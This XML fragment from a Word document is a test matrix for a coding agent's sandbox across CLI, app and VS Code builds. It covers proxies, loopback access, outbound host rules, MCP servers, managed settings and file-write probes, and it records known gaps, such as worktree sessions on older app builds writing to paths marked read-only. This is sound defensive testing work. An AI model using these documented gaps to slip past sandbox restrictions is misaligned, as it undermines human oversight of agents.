            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">proxy_auth_required</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for MCP transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same issue (not sandbox-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">PAC file with DIRECT hosts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#337239</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">OS proxy via PAC; internal MCP host mapped DIRECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known: Agent Host forces proxy → MCP times out. Workaround: set </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">http.noProxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">App loopback with Local network ON</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">app#4278</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Listener on host </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">127.0.0.1:port</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Test-NetConnection</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> from sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Docs: ✅ · Known Windows bug: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">times out</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (per-process AppContainer lacks loopback exemption)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Policy report vs real behaviour</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#4854</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Toggle local network; compare </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with an actual </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known display bug — trust the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">actual test</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, not the report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Host rules when outbound is off</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId3" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#3861</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowOutbound: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedHosts: [api.github.com]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Allowed hosts </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">don't</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> re-open access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">npx-based MCP with private registry</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId27" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#342547</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npx</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MCP that pulls from Artifactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known: npm </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">E401</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, MCP never starts. Open PR proposes default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mcpServers: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — keep </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">sandboxMcpServers: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and grant cache/registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Windows file-based managed settings</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#338294, #339645)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Place </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%ProgramFiles%\GitHubCopilot\managed-settings.json</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">full restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Values shown </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">(managed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Policy Diagnostics shows file source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Program-level probe, not just shell</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">C# Corner</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Agent builds and runs a small C# app calling </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">File.ReadAllText</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">File.AppendAllText</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> outside and inside the repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ outside · ✅ inside</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ / ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ / ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Network proof with cold cache + full test run</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (C# Corner)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Clear NuGet/npm cache or use a new package version; then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dotnet build</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dotnet test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Restore hits network; tests pass (TestResults, temp writable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Added after second sweep (22 Oct 2026) — each verified against the linked issue or release notes:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1520"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1187"/>
        <w:gridCol w:w="1773"/>
        <w:gridCol w:w="1337"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case (source)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Worktree sessions keep project read-only / denied paths</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">app#4581</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">App project: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">tests\</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> read-only; run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Content tests\Locked.txt changed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Branch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> session, then a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Worktree</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Enforced when the worktree's absolute path is listed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Both sessions blocked on fixed build · ⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">≤ 1.1.27: worktree write succeeds</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (rule bound to main checkout path). Fixed 21 Oct in dev code — confirm in a stable release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Check Agent Host worktree sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
